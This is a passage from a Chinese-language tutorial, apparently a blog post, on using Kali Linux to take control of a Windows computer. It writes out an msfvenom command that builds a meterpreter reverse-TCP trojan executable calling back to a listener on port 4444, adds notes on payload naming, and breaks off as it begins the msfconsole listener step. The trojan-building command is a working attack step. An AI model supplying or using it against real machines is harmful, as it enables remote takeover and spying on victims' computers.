最近某安全厂商很火,很多离职员工都是被这套系统抓出来的。其实原理很简单,本文就用很多人都用过的kali系统,告诉你,想要控制你的电脑有多简单!
网上的文章很多,如这篇,Kali攻防,写的不错,但是其中的步骤个人感觉还是有些乱,而且kali的版本也不同,所以还是自己整理一下。文中会涉及一些基本概念,请大家自己脑补。
1、生成木马
以前看其他文章没有写仔细,先启动了msfconsole,结果采用如下语句一直无法生成木马,后来发现是步骤错了,不能先启动msfconsole,直接在kali的命令行里输入以下语句即可:
root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp -e LHOST=10.0.2.15 LPORT=4444 -f exe > testhack.exe
成功执行后,会在root文件夹下生成一个exe文件,留好了备用。记者这里的LHOST是用本地IP。
需要提醒的是:
很多文章中payload都用的是windows/x64/meterpreter/reverse_tcp,但我的kali版本中是windows/x64/meterpreter_reverse_tcp,这一点请注意,可以用show payloads看看你的系统是不是跟我一样?
2、执行msfconsole
上面讲了&#x